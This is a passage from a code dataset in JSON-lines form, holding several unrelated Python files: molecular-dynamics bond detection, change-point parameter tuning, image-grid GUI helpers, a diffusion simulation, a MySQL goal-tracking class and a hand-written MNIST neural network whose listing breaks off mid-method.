DetectDump(Detect):\n def _readN(self):\n # copy from reacnetgenerator on 2018-12-15\n iscompleted = False\n with open(self.filename if isinstance(self.filename, str) else self.filename[0]) as f:\n for index, line in enumerate(f):\n if line.startswith(\"ITEM:\"):\n linecontent = self.LineType.linecontent(line)\n else:\n if linecontent == self.LineType.NUMBER:\n if iscompleted:\n stepbindex = index\n break\n else:\n iscompleted = True\n stepaindex = index\n N = int(line.split()[0])\n atomtype = np.zeros(N, dtype=int)\n elif linecontent == self.LineType.ATOMS:\n s = line.split()\n atomtype[int(s[0])-1] = int(s[1])\n steplinenum = stepbindex-stepaindex\n self._N = N\n self.atomtype = atomtype\n self.atomnames = self.atomname[self.atomtype-1]\n return steplinenum\n\n def readatombondtype(self, item):\n (step, lines), needlerror = item\n if needlerror:\n trajline, errorline = lines\n item = (step, trajline), None\n lerror = np.fromstring(errorline, dtype=float, sep=' ')[7:]\n d = defaultdict(list)\n step_atoms, ids = self.readcrd(item)\n if needlerror:\n lerror = [x for (y, x) in sorted(zip(ids, lerror))]\n level = self._crd2bond(step_atoms, readlevel=True)\n for i, (n, l) in enumerate(zip(self.atomnames, level)):\n if not needlerror or lerror[i] > self.errorlimit:\n # Note that atom id starts from 1\n d[pickle.dumps((n, sorted(l)))].append(i+1)\n return d, step\n\n def readmolecule(self, lines):\n bond = [None]*self._N\n step_atoms, _ = self.readcrd(((None, lines), None))\n bond = self._crd2bond(step_atoms, readlevel=False)\n molecules = connectmolecule(bond)\n # return atoms as well\n return molecules, step_atoms\n\n @classmethod\n def _crd2bond(cls, step_atoms, readlevel):\n # copy from reacnetgenerator on 2019/4/13\n atomnumber = len(step_atoms)\n if step_atoms.pbc.any():\n # Apply period boundry conditions\n # add ghost atoms\n repeated_atoms = step_atoms.repeat(2)[atomnumber:]\n tree = cKDTree(step_atoms.get_positions())\n d = tree.query(repeated_atoms.get_positions(), k=1)[0]\n nearest = d < 5\n ghost_atoms = repeated_atoms[nearest]\n realnumber = np.where(nearest)[0] % atomnumber\n step_atoms += ghost_atoms\n xyzstring = ''.join((f\"{atomnumber}\\n{__name__}\\n\", \"\\n\".join(\n [f'{s:2s} {x:22.15f} {y:22.15f} {z:22.15f}'\n for s, (x, y, z) in zip(\n step_atoms.get_chemical_symbols(),\n step_atoms.positions)])))\n conv = openbabel.OBConversion()\n conv.SetInAndOutFormats('xyz', 'mol2')\n mol = openbabel.OBMol()\n conv.ReadString(mol, xyzstring)\n mol2string = conv.WriteString(mol)\n linecontent = -1\n if readlevel:\n bondlevel = [[] for i in range(atomnumber)]\n else:\n bond = [[] for i in range(atomnumber)]\n for line in mol2string.split('\\n'):\n if line.startswith(\"@BOND\"):\n linecontent = 0\n else:\n if linecontent == 0:\n s = line.split()\n if len(s) > 3:\n s1, s2 = int(s[1])-1, int(s[2])-1\n if s1 >= atomnumber and s2 >= atomnumber:\n # duplicated\n continue\n elif s1 >= atomnumber:\n s1 = realnumber[s1-atomnumber]\n elif s2 >= atomnumber:\n s2 = realnumber[s2-atomnumber]\n if readlevel:\n level = 9 if s[3] == 'ar' else int(s[3])\n bondlevel[s1].append(level)\n bondlevel[s2].append(level)\n else:\n bond[s1].append(s2)\n bond[s2].append(s1)\n return bondlevel if readlevel else bond\n\n def readcrd(self, item):\n \"\"\"Only this function can read coordinates.\"\"\"\n (_, lines), _ = item\n boxsize = []\n step_atoms = []\n ids = []\n for line in lines:\n if line:\n if line.startswith(\"ITEM:\"):\n linecontent = self.LineType.linecontent(line)\n else:\n if linecontent == self.LineType.ATOMS:\n s = line.split()\n ids.append(int(s[0]))\n step_atoms.append(Atom(\n self.atomname[int(s[1]) - 1],\n tuple(map(float, s[2: 5]))))\n elif linecontent == self.LineType.BOX:\n s = line.split()\n boxsize.append(float(s[1])-float(s[0]))\n # sort by ID\n step_atoms = [x for (y, x) in sorted(zip(ids, step_atoms))]\n step_atoms = Atoms(step_atoms, cell=boxsize, pbc=self.pbc)\n return step_atoms, ids\n\n class LineType(Enum):\n \"\"\"Line type in the LAMMPS dump files.\"\"\"\n\n TIMESTEP = auto()\n ATOMS = auto()\n NUMBER = auto()\n BOX = auto()\n OTHER = auto()\n\n @classmethod\n def linecontent(cls, line):\n \"\"\"Return line content.\"\"\"\n if line.startswith(\"ITEM: TIMESTEP\"):\n return cls.TIMESTEP\n if line.startswith(\"ITEM: ATOMS\"):\n return cls.ATOMS\n if line.startswith(\"ITEM: NUMBER OF ATOMS\"):\n return cls.NUMBER\n if line.startswith(\"ITEM: BOX\"):\n return cls.BOX\n return cls.OTHER\n","sub_path":"mddatasetbuilder/detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":9593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"329354621","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 6 09:09:50 2017\r\n\r\n@author: muramatsu\r\n\"\"\"\r\n\r\n# -*- coding: utf-\r\n# noinspection PyUnresolvedReferences\r\nimport matplotlib.pyplot as plt\r\nimport changefinder\r\nimport numpy as np\r\nimport pandas as pd\r\nimport statsmodels.tsa.stattools as stt\r\nfrom skopt import gp_minimize\r\nfrom skopt.plots import plot_convergence\r\nimport seaborn as sns\r\nimport math\r\n\r\n#input data\r\ndf = pd.read_csv(\"indices_I101.csv\",header=None)[1]\r\ntmp = np.array(df)\r\n\r\npcf = stt.pacf(tmp)\r\n# noinspection PyUnresolvedReferences\r\nlag = np.argsort(np.absolute(pcf))[::-1][1]\r\n\r\n#function to calculate change score\r\ndef scoreCalculate(r,smooth):\r\n cf = changefinder.ChangeFinder(r=r, order=lag, smooth=smooth)\r\n ret = []\r\n for i in tmp:\r\n score = math.exp(cf.update(i))\r\n ret.append(score)\r\n return ret\r\n \r\n \r\n#function to optimize\r\ndef func(params):\r\n r,smooth = params\r\n return np.var(scoreCalculate(r, smooth))\r\n\r\n#parameter bounds\r\ndimensions = [(0.1, 0.5), \r\n (3,100),\r\n] \r\n\r\n#minimize variance of change score\r\nres_gp = gp_minimize(func, dimensions, n_calls=10, random_state=0,n_random_starts=10)\r\nprint(res_gp.x)\r\n\r\n#change score with best param\r\nscore = scoreCalculate(res_gp.x[0],res_gp.x[1])\r\n\r\n#plot result\r\nfig = plt.figure(figsize=(13, 7))\r\nax = fig.add_subplot(111)\r\nax.plot(score)\r\nax2 = ax.twinx()\r\nax2.plot(tmp,'r')\r\nplt.show()\r\n\r\n#convergence\r\nplot_convergence(res_gp)\r\n#density of change score\r\nsns.distplot(score, hist=False)\r\n\r\n#output change score as csv\r\npd.DataFrame(score).to_csv(\"score.csv\")\r\n","sub_path":"changeFinderParamEstimate.py","file_name":"changeFinderParamEstimate.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"421488718","text":"# Import required libraries\nimport os\nimport ctypes\nimport cv2\nimport io\n\nfrom PIL import Image, ImageTk\n\n# Get native screen resolution, times the ratio for native compatible resolution, avoid bleeding edges\ndef get_scr_size(ratio):\n user32 = ctypes.windll.user32 # ctypes function\n scr_size = user32.GetSystemMetrics(0), user32.GetSystemMetrics(1) # ctypes function, returns a list of parameters\n scr_width = scr_size[0]\n scr_height = scr_size[1]\n width = int(scr_width * ratio) # get width*ratio, for later GUI scaling\n height = int(scr_height * ratio) # get height*ratio, for later GUI scaling\n\n return width, height\n\n# Draw a grid on to the image, using an overlay image of grid\n# Could use an another approach, using PySimpleGUI graphing functions since images are shown on graph-based canvas\ndef gui_draw(parent_path, file_name):\n # Draw a guidance grid onto the image\n img = cv2.imread(file_name)\n # Avoid using static addresses\n # Use this instead, but be cautious :\n # grid_img = cv2.imread(os.getcwd() + \"\\\\data_process\\\\ref_image\\\\imGrid.png\")\n # Make sure the working files are in the right positions before use\n grid_img = cv2.imread(parent_path + \"\\\\data_process\\\\grid_img\\\\imGrid.png\")\n ### Debug: show Grid image\n # cv2.imshow(\"Image\", grid_img)\n # cv2.waitKey()\n\n rows, cols, channel = grid_img.shape\n roi = img[0:rows, 0:cols]\n\n # Add grid to the selected reference image\n img2gray = cv2.cvtColor(grid_img, cv2.COLOR_BGR2GRAY)\n ret, mask = cv2.threshold(img2gray, 200, 255, cv2.THRESH_BINARY_INV)\n mask_inv = cv2.bitwise_not(mask)\n img = cv2.bitwise_and(roi, roi, mask=mask_inv)\n grid_img_fg = cv2.bitwise_and(grid_img, grid_img, mask=mask)\n img = cv2.add(img, grid_img_fg)\n\n # Get file name, write the image with grid. This will be used in later processing\n name = os.path.splitext(file_name)[0]+\"_grid.jpg\"\n # Avoid using static addresses\n # Use this instead, but be cautious:\n # file_path = os.path.join(os.getcwd()+\"\\\\data_process\\\\ref_image\", name)\n file_path = os.path.join(os.getcwd() + \"\\\\data_process\\\\ref_image\", name)\n cv2.imwrite(file_path, img)\n return file_path\n\n# Convert image data to base64 values, for later drawing on graph canvas\ndef get_img_data(f, max_size, first=False):\n img = Image.open(f)\n img.thumbnail(max_size, resample=Image.BICUBIC)\n if first:\n b_io = io.BytesIO()\n img.save(b_io, format=\"PNG\")\n del img\n return b_io.getvalue()\n return ImageTk.PhotoImage(img)\n","sub_path":"infoGUI.py","file_name":"infoGUI.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"13504884","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom pylab import *\nfrom scipy.optimize import leastsq\nimport random\nfrom numba import jit\n\n\n#definiting intial constants.\nD = 2.0\nX = 2.0\nN = 20.0\nx = 40\ndl = X/x\ndt = dl**2/8\nt = 201\nrho = np.zeros((x,t))\nrho[19,0] = 1.0\nrho[20,0] = 0.7\nrho[18,0] = 0.7\n\n#jit is used for speeding up the process\n@jit\ndef calc_rho(t):\n\tfor n in range (t-1):\n\t\tfor i in range (0,39):\n\t\t\trho[i,n+1] = rho[i,n] + (D*dt/dl**2)*(rho[i+1,n]+rho[i-1,n]-2*rho[i,n])\n\t\t\t#print rho[i,n+1]\n\treturn rho\n\n\nrho = calc_rho(201)\n#need x to plot and fit\nx = (np.linspace(-20,21,40))*dl\n\n#fitting\ndef gaussian(x, a, s):\n\treturn a/np.sqrt(2*np.pi*s)*np.exp(-(x)**2/(2*s))\n\n#need to fit 5 plots, let's define some initial variables\ntime = [0.0]*5\nopt_func = [0.0]*5\nfit_A = [0.0]*5\nfit_sigma = [0.0]*5\n\nT = np.linspace(0, t-1, 5)\n\n#here is where the fitting begins\nfor m in range(5):\n\tguess_A = 0.4\n\tguess_sigma = 10\n\topt_func = lambda p: p[0]/np.sqrt(2*np.pi*p[1])*np.exp(-(x)**2/(2*p[1]))-rho[:,T[m]]\n\tfit_A[m], fit_sigma[m] = leastsq(opt_func, [guess_A, guess_sigma]) [0]\n\n\nx1 = (np.linspace(-20,21,400))*dl\n\n#LaTeX converter\nplt.rc('text', usetex = True)\n\ntime = T*dt\n\n\nplt.figure()\n#finally plotting\nplt.plot(x, rho[:,T[0]], 'k.')\nplt.plot(x1, gaussian(x1,fit_A[0], fit_sigma[0]), 'm', linewidth = 2, label = r' T = 0')\nplt.plot(x, rho[:,T[1]], 'ko')\nplt.plot(x1, gaussian(x1,fit_A[1],fit_sigma[1]),'b-', linewidth = 2, label = r' T = 40')\nplt.plot(x, rho[:,T[2]], 'kx')\nplt.plot(x1, gaussian(x1,fit_A[1], fit_sigma[2]),'r-', linewidth = 2, label = r' T = 80')\nplt.plot(x, rho[:,T[3]], 'kv')\nplt.plot(x1, gaussian(x1,fit_A[3], fit_sigma[3]),'g-', linewidth = 2, label = r' T= 120')\nplt.plot(x, rho[:,T[4]], 'k^')\nplt.plot(x1, gaussian(x1,fit_A[4], fit_sigma[4]),'c-', linewidth = 2, label = r' T = 160')\nplt.plot(x, rho[:,T[0]], 'k.')\n\nplt.ylabel(r'PDF(arb.)',fontsize = 16)\nplt.legend(loc = 'upper right')\nplt.title (r'Probability distribution function (PDF) at different times', fontsize = 16)\nplt.axis([-1.5,1.5,0,1])\n#plt.show() \nplt.savefig('Problem2.pdf')\n\nplt.close()\nplt.figure()\nplt.plot(time[0:4], fit_sigma[0:4], 'b--o',linewidth = 3)\nplt.xlabel(r't (arb.)', fontsize = 16)\nplt.ylabel(r'$\\sigma^2$(arb.)',fontsize = 16)\nplt.title (r'Standard deviation as a function of time', fontsize = 16)\nplt.savefig('Problem2b.pdf')\n\n","sub_path":"scripts/OBSOLETE/PHY566_GroupD_Project.py","file_name":"PHY566_GroupD_Project.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"445024152","text":"\n\nfrom modules.portal_sns import connection\n\nfrom MySQLdb.cursors import DictCursor\nimport MySQLdb\nimport hashlib\nimport datetime\nimport sys\nimport threading\nsys.path.append(\"../../modules\")\n\nclass MonthlyGoal():\n\n\n def __init__(self):\n\n MonthlyGoal.db = connection()\n # self.db.ping(True)\n\n def __del__(self):\n # self.db.close()\n pass\n\n \n def cursor(self):\n cursor = self.db.cursor(DictCursor)\n return cursor\n\n\n def uuid_generator(self, uid, title):\n return hashlib.sha256((uid+title).encode()).hexdigest()\n\n\n def insert(self, uid, title, detail):\n \n today = datetime.date.today()\n date = datetime.datetime(today.year, today.month, 1)\n uuid =self.uuid_generator(uid, title)\n\n stmt = \"\"\" INSERT INTO monthly_goal\n (title, detail, member_uuid, goal_uuid, date, completed, delete_flg)\n VALUE (%s, %s, %s, %s, %s, %s, %s)\n \"\"\"\n\n cursor = self.cursor()\n params = (title, detail, uid, uuid, date , 0, 0)\n try:\n cursor.execute(stmt, params)\n self.db.commit()\n cursor.close()\n return uuid\n\n except:\n self.db.rollback()\n cursor.close()\n return False\n\n\n def get_list_by_uid(self, uid, year=False, month=False):\n\n print(threading.get_ident())\n today = datetime.datetime.today()\n\n if not year:\n year = today.year\n\n if not month:\n month = today.month\n \n date = datetime.datetime(year, month, 1)\n\n stmt = \"\"\"SELECT title, detail, goal_uuid, completed FROM monthly_goal\n WHERE member_uuid=%s AND date=%s AND delete_flg='0'\"\"\"\n\n params = (uid, date)\n cursor = self.cursor()\n # print(id(cursor))\n try:\n cursor.execute(stmt, params)\n result = cursor.fetchall()\n # print(cursor.nextset())\n\n cursor.close()\n # print(result)\n return result\n \n except MySQLdb.Error as e:\n print(\"goal error\", e)\n cursor.close()\n return []\n\n\n def update(self, uuid, is_complete, delete_flg):\n\n stmt = \"\"\"UPDATE monthly_goal set completed=%s, delete_flg=%s WHERE goal_uuid=%s;\n \"\"\"\n\n cursor = self.cursor()\n\n try:\n cursor.execute(stmt, (is_complete, delete_flg, uuid))\n self.db.commit()\n cursor.close()\n return True\n\n except:\n self.db.rollback()\n cursor.close()\n return False\n\n def get(self, uuid):\n\n stmt = \"SELECT * FROM monthly_goal WHERE goal_uuid=%s\"\n cursor = self.cursor()\n\n cursor.execute(stmt, (uuid, ))\n result = cursor.fetchone()\n cursor.close()\n return result","sub_path":"dao/monthly_goal.py","file_name":"monthly_goal.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"139966086","text":"from keras.datasets import fashion_mnist\nfrom keras.datasets import mnist\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport copy\nfrom sklearn.model_selection import train_test_split \nimport pickle\nimport pandas as pd\nimport wandb\nimport os\n\n\nconfig_ = {\n 'learning_rate': 0.001,\n 'epochs': 10,\n 'no_hidden_layers': 3,\n 'size_hidden_layers':128,\n 'optimizer': 'nadam',\n 'batch_size':100,\n 'activation': 'tanh',\n 'weight_initializations': 'random',\n 'weight_decay': 0,\n 'loss_function':'ce'\n }\n\nmodel_name = 'Assignment1/mnist-model/'\n#folder name end it with a /\n\ngamma = 0.9\nbeta = 0.9\nepsilon = 0.00000001\nbeta1 = 0.9\nbeta2 = 0.99\nno_classes = 10\n\n\n(train_images, train_labels), (test_images, test_labels) = mnist.load_data()\ntrain_images,val_images, train_labels, val_labels=train_test_split(train_images, train_labels,test_size=0.1,random_state=1)\ntrain_images = np.array(train_images)\ntrain_images = train_images / 255.0\nval_images = np.array(val_images)\nval_images = val_images / 255.0\ntest_images = np.array(test_images)\ntest_images = test_images / 255.0\n\n\ntrain_input_neurons = list()\ntest_input_neurons = list()\nval_input_neurons = list()\n\nfor i in range(len(train_images)):\n train_input_neurons.append(list(np.concatenate(train_images[i]).flat))\n\nfor i in range(len(val_images)):\n val_input_neurons.append(list(np.concatenate(val_images[i]).flat))\n\nfor i in range(len(test_images)):\n test_input_neurons.append(list(np.concatenate(test_images[i]).flat))\n\ntrain_input_neurons = np.array(train_input_neurons).T\nval_input_neurons = np.array(val_input_neurons).T\ntest_input_neurons = np.array(test_input_neurons).T\n\n\n\n\nclass NN(object):\n def __init__(self, hidden_layers, num_outputs,batch_size,learning_rate, epoch,activation,weight_init,weight_decay,loss_function):\n self.num_inputs = len(train_input_neurons)\n self.hidden_layers = hidden_layers\n self.num_outputs = num_outputs\n self.num_classes = num_outputs\n self.batch_size = batch_size\n self.learning_rate = learning_rate\n self.epoch = epoch\n self.iterations = 0\n self.activation = activation\n self.weight_init = weight_init\n self.weight_decay = weight_decay\n self.loss_function = loss_function\n layers = [self.num_inputs] + hidden_layers + [self.num_outputs]\n\n np.random.seed(0)\n self.weights = []\n self.bias = []\n if self.weight_init == 'random': \n for i in range(len(layers)-1):\n self.weights.insert(i, (np.random.rand(layers[i+1], layers[i]) - 0.5))\n self.bias.insert(i, (np.random.rand(layers[i+1],1) - 0.5))\n else:\n for i in range(len(layers)-1):\n sd = 6/(layers[i+1]+layers[i])\n self.weights.insert(i, (np.random.uniform(low = -sd ,high = sd, size =(layers[i+1], layers[i]))))\n self.bias.insert(i, (np.random.uniform(low = -sd ,high = sd, size = (layers[i+1],1))))\n \n \n \n def sigmoid(self, x):\n \n x = x.T\n y = np.zeros(x.shape)\n for i in range(y.shape[0]):\n y[i] = 1.0 / (1 + np.exp(-x[i]))\n \n return y.T\n\n\n def tanh(self,x):\n x = x.T\n y = np.zeros(x.shape)\n for i in range(y.shape[0]):\n y[i] = (np.exp(x[i]) - np.exp(-x[i])) / (np.exp(x[i]) + np.exp(-x[i]))\n return y.T\n\n def Relu(self,x):\n x = x.T\n y = np.zeros(x.shape)\n for i in range(y.shape[0]):\n y[i] = np.maximum(x[i],0)\n return y.T\n\n def d_sigmoid(self, x): \n y = self.sigmoid(x)\n y = y * (1 - y)\n return y\n\n def d_tanh(self,x):\n x = x.T\n y = np.zeros(x.shape)\n for i in range(y.shape[0]):\n y[i] = 1-np.power((np.exp(x[i]) - np.exp(-x[i])) / (np.exp(x[i]) + np.exp(-x[i])),2)\n return y.T\n\n def d_Relu(self,x):\n x = x.T\n y = np.zeros(x.shape)\n for i in range(y.shape[0]):\n y[i] = np.where(x[i] <= 0, 0, 1)\n return y.T\n\n def softmax(self, x):\n \n x = x.T\n y = np.zeros(x.shape)\n for i in range(x.shape[0]):\n y[i] = np.exp(x[i])/sum(np.exp(x[i]))\n \n return y.T\n\n def softmax_num_sable(self, x):\n \n x = x.T\n y = np.zeros(x.shape)\n for i in range(x.shape[0]):\n exps = x[i] - np.max(x[i])\n exps = np.exp(exps)\n y[i] = exps/sum(exps)\n return y.T\n\n def forward_prop(self, X):\n hiden_operation = 1\n self.ai = {}\n self.hi = {}\n self.hi[hiden_operation - 1] = X\n self.ai[hiden_operation - 1] = X\n\n for w,b in zip(self.weights, self.bias):\n if(hiden_operation < len(self.weights)):\n self.ai[hiden_operation] = w.dot(self.hi[hiden_operation-1]) + b\n if(self.activation =='sigmoid'):\n self.hi[hiden_operation] = self.sigmoid(self.ai[hiden_operation])\n elif(self.activation =='tanh'):\n self.hi[hiden_operation] = self.tanh(self.ai[hiden_operation])\n elif(self.activation =='Relu'):\n self.hi[hiden_operation] = self.Relu(self.ai[hiden_operation])\n hiden_operation += 1\n \n else:\n self.ai[hiden_operation] = w.dot(self.hi[hiden_operation-1]) + b\n self.hi[hiden_operation] = self.softmax_num_sable(self.ai[hiden_operation])\n \n return self.hi, self.ai, self.hi[hiden_operation]\n\n def one_hot(self, y):\n one_hot_Y = np.zeros((len(y), self.num_classes ))\n one_hot_Y[np.arange(len(y)), y] = 1\n one_hot_Y = one_hot_Y\n return one_hot_Y\n\n def backward_prop(self, h, a, y_hat, y):\n eY = self.one_hot(y)\n if self.loss_function == 'ce':\n d_al_theta = y_hat - eY.T\n elif self.loss_function == 'sq':\n d_al_theta = (y_hat - eY.T) * y_hat * (1 - y_hat) \n\n self.d_weights = {}\n self.d_bias ={}\n self.d_h = {}\n self.d_a = {}\n no_of_samples = len(h[0])\n\n L = len(self.hidden_layers)\n self.d_a[L+1] = d_al_theta\n \n \n for k in range(L, -1, -1):\n \n self.d_weights[k] = ((1/no_of_samples) * self.d_a[k+1].dot(h[k].T)) + (self.weight_decay * self.weights[k])\n self.d_bias[k] = ((1/no_of_samples) * np.sum(self.d_a[k+1], axis = 1, keepdims = True)) + (self.weight_decay *self.bias[k] )\n self.d_h[k] = self.weights[k].T.dot(self.d_a[k+1])\n if(self.activation =='sigmoid'):\n self.d_a[k] = self.d_h[k] * self.d_sigmoid(a[k])\n elif(self.activation =='tanh'):\n self.d_a[k] = self.d_h[k] * self.d_tanh(a[k])\n elif(self.activation =='Relu'):\n self.d_a[k] = self.d_h[k] * self.d_Relu(a[k])\n return self.d_weights, self.d_bias\n \n def get_prediction(self, y):\n return np.argmax(y, 0)\n \n def get_accuracy(self, prediction, y):\n return np.sum(prediction == y) / y.size\n\n def make_predictions(self, x):\n _, _, y_hatt = self.forward_prop(x)\n predictions = self.get_prediction(y_hatt)\n return predictions\n\n def cross_entropy(self, y,yhat):\n return (-sum([math.log(yhat[y[i],i]) for i in range(len(y))])/len(y)) + (self.weight_decay*0.5 * (np.sum([np.linalg.norm(self.weights[i]) for i in range(len(self.weights))])))\n\n def mse(self, y,yhat):\n return (np.sum(np.square(yhat- (self.one_hot(y)).T)))/len(y) + (self.weight_decay*0.5 * (np.sum([np.linalg.norm(self.weights[i]) for i in range(len(self.weights))])))\n\n def test_prediction(self, current_image, y):\n prediction = self.make_predictions(current_image)\n label = y\n print(\"Prediction: \", prediction)\n print(\"Label: \", label) \n current_image = current_image.reshape((28, 28)) * 255\n plt.gray()\n plt.imshow(current_image, interpolation='nearest')\n plt.show()\n\n def logging(self,j):\n output_h, output_a, y_hat = self.forward_prop(train_input_neurons)\n predictions = self.get_prediction(y_hat)\n accuracy = self.get_accuracy(predictions, train_labels)\n if(self.loss_function =='ce'):\n loss_train = self.cross_entropy(train_labels,y_hat)\n elif self.loss_function =='sq':\n loss_train = self.mse(train_labels,y_hat)\n output_h, output_a, y_hat = self.forward_prop(val_input_neurons)\n val_predictions = self.get_prediction(y_hat)\n val_accuracy = self.get_accuracy(val_predictions, val_labels)\n if(self.loss_function =='ce'):\n loss_valid = self.cross_entropy(val_labels,y_hat)\n elif self.loss_function =='sq':\n loss_valid = self.mse(val_labels,y_hat)\n loss_valid = self.cross_entropy(val_labels,y_hat)\n print(\"epoch______{} : {}\".format(j, accuracy))\n wandb.log({\n \"epoch\": j,\n \"loss\": loss_train,\n \"accuracy\": accuracy,\n \"val_loss\": loss_valid,\n \"val_accuracy\": val_accuracy})\n\n\n def confusion_matrix(self, actual_labels, predicted_labels):\n available_classes = np.unique(np.concatenate((actual_labels,predicted_labels)))\n confusion_matrix_ = np.zeros((len(available_classes),len(available_classes)),dtype=np.int)\n for i,actual in enumerate(available_classes):\n for j,predicted in enumerate(available_classes):\n confusion_matrix_[i,j] = np.where((actual_labels == actual)&(predicted_labels == predicted))[0].shape[0]\n\n wandb.log({ \"Confusion Matrix\" : wandb.plot.confusion_matrix( \n probs = None,\n y_true = actual_labels,\n preds = predicted_labels,\n class_names = available_classes\n )\n })\n return confusion_matrix_\n\n def confusion_matrix_plot(self, confusion_matrix, title='Confusion matrix', cmap=plt.cm.gray_r):\n confusion_matrix = confusion_matrix/10\n plt.matshow(confusion_matrix, cmap=cmap)\n #plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(confusion_matrix))\n plt.xticks(tick_marks)\n plt.yticks(tick_marks)\n plt.ylabel(\"actual\")\n plt.xlabel(\"predicted\")\n\n\n\n def gradient_descent(self, input_neurons, learning_rate, epoch):\n \n for j in range(epoch):\n output_h, output_a, y_hat = self.forward_prop(input_neurons)\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, train_labels)\n for i in range(len(d_weights)):\n self.weights[i] = self.weights[i] - learning_rate * d_weights[i]\n self.bias[i] = self.bias[i] - learning_rate * d_bias[i]\n \n self.logging(j)\n\n return self.weights, self.bias\n\n def sgd(self, input_neurons, learning_rate, epoch):\n for j in range(epoch):\n\n for i in range(input_neurons.shape[1]):\n output_h, output_a, y_hat = self.forward_prop(input_neurons[:,i].reshape((input_neurons.shape[0],1)))\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, np.array([train_labels[i]]))\n \n\n for d in range(len(d_weights)):\n self.weights[d] = self.weights[d] - learning_rate * d_weights[d]\n self.bias[d] = self.bias[d] - learning_rate * d_bias[d]\n\n self.logging(j)\n\n return self.weights, self.bias\n\n def momentum_gd(self, input_neurons, gamma):\n self.w_update ={} \n self.b_update ={} \n for j in range(self.epoch):\n self.iterations = math.ceil(input_neurons.shape[1]/self.batch_size)\n for i in range(self.iterations):\n output_h, output_a, y_hat = self.forward_prop(input_neurons[:,(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n if(self.batch_size==1):\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, np.array([train_labels[i]]))\n else:\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, train_labels[(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n\n if(j==0 and i==0):\n for d in range(len(d_weights)):\n self.weights[d] = self.weights[d] - self.learning_rate * d_weights[d]\n self.w_update[d] = self.learning_rate * d_weights[d]\n self.bias[d] = self.bias[d] - self.learning_rate * d_bias[d]\n self.b_update[d] = self.learning_rate * d_bias[d]\n else:\n for d in range(len(d_weights)):\n self.weights[d] = self.weights[d] - ((gamma *self.w_update[d] )+(self.learning_rate * d_weights[d]))\n self.w_update[d] = (gamma *self.w_update[d] )+(self.learning_rate * d_weights[d])\n self.bias[d] = self.bias[d] - ((gamma *self.b_update[d])+(self.learning_rate * d_bias[d]))\n self.b_update[d] = (gamma *self.b_update[d])+(self.learning_rate * d_bias[d]) \n\n self.logging(j)\n \n return self.weights, self.bias\n\n def nesterov_accelerated_gd(self, input_neurons, gamma):\n self.w_update ={} \n self.b_update ={}\n for j in range(self.epoch):\n self.iterations = math.ceil(input_neurons.shape[1]/self.batch_size)\n for i in range(self.iterations):\n output_h, output_a, y_hat = self.forward_prop(input_neurons[:,(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n if(self.batch_size==1):\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, np.array([train_labels[i]]))\n else:\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, train_labels[(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n\n if(j!=0 or i!=0):\n for d in range(len(d_weights)):\n self.weights[d] = self.weights[d] - ((gamma *self.w_update[d] ))\n self.bias[d] = self.bias[d] - ((gamma *self.b_update[d]))\n\n output_h, output_a, y_hat = self.forward_prop(input_neurons[:,(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n if(self.batch_size==1):\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, np.array([train_labels[i]]))\n else:\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, train_labels[(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n\n if(j==0 and i==0):\n for d in range(len(d_weights)):\n self.weights[d] = self.weights[d] - self.learning_rate * d_weights[d]\n self.w_update[d] = self.learning_rate * d_weights[d]\n self.bias[d] = self.bias[d] - self.learning_rate * d_bias[d]\n self.b_update[d] = self.learning_rate * d_bias[d]\n else:\n for d in range(len(d_weights)):\n self.weights[d] = self.weights[d] - ((self.learning_rate * d_weights[d]))\n self.w_update[d] = (gamma *self.w_update[d] )+(self.learning_rate * d_weights[d])\n self.bias[d] = self.bias[d] - ((self.learning_rate * d_bias[d]))\n self.b_update[d] = (gamma *self.b_update[d])+(self.learning_rate * d_bias[d]) \n\n\n self.logging(j)\n return self.weights, self.bias\n\n def rmsprop(self, input_neurons, beta,epsilon):\n w_vt ={} \n b_vt ={}\n for j in range(self.epoch):\n self.iterations = math.ceil(input_neurons.shape[1]/self.batch_size)\n for i in range(self.iterations):\n output_h, output_a, y_hat = self.forward_prop(input_neurons[:,(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n if(self.batch_size==1):\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, np.array([train_labels[i]]))\n else:\n d_weights, d_bias = self.backward_prop(output_h, output_a, y_hat, train_labels[(i*self.batch_size): min((((i+1)*self.batch_size)-1),input_neurons.shape[1]-1)])\n\n if(j!=0 or i!=0):\n for d in range(len(d_weights)):\n w_vt[d]= beta * w_vt[d] + (1-beta) * np.power(d_weights[d],2)\n b_vt[d] = beta * b_vt[d] + (1-beta) * np.power(d_bias[d],2)\n w = 1/np.power(w_vt[d]+epsilon,0.5)\n b = 1/np.power(b_vt[d]+epsilon,0.5)\n self.weights[d] = self.weights[d] - 